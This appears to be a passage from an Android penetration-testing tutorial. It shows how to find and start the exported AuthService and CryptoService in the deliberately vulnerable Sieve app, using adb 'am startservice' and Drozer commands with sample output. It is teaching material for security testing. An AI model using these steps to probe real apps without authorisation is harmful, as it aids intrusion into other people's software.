Attacking Services
Review your notes of the Service names, and if they are explicitly or implicitly exported. For this, I am using the intentionally vulnerable app Sieve, from WithSecureLabs.
Here are the Services notes from the app:
[SERVICE] com.withsecure.example.sieve.service.AuthService
Exported: true
Process: remote
[SERVICE] com.withsecure.example.sieve.service.CryptoService
Exported: true
Process: remote
There are 2 Services that are explicitly exported.
Access Exported Services
Attempt to start the exported services manually, to see how this functions and how we can further attack the app. Manually starting the Service can be performed using the Activity Manager command (am
), with the startservice
sub-command.
These commands assume you are already in a shell of the Android device. Most likely through adb
.
Start Services
The basic command syntax is below. There are two ways to run this command, the full command & the shorthand method. I tend to use the shorthand version, but if that doesn't work then you will need to know the full command syntax.
# Full command
am startservice <package-id> <package-id>.service.<service-name>
# Shorthand command
am startservice <package-id>/.service.<service-name>
com.withsecure.example.sieve.service.AuthService
# Activity Manager command:
oriole:/ $ am startservice com.withsecure.example.sieve/.service.AuthService
Starting service: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=com.withsecure.example.sieve/.service.AuthService }
# Drozer command:
dz> run app.service.start --component com.withsecure.example.sieve com.withsecure.example.sieve.service.AuthService
You will not see any feedback of these commands since a Service does not have a GUI component to it.
com.withsecure.example.sieve.service.CryptoService
# Activity Manager command:
oriole:/ $ am startservice com.withsecure.example.sieve/.service.CryptoService
Starting service: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=com.withsecure.example.sieve/.service.CryptoService }
# Drozer command:
dz> run app.service.start --component com.withsecure.example.sieve com.withsecure.example.sieve.service.CryptoService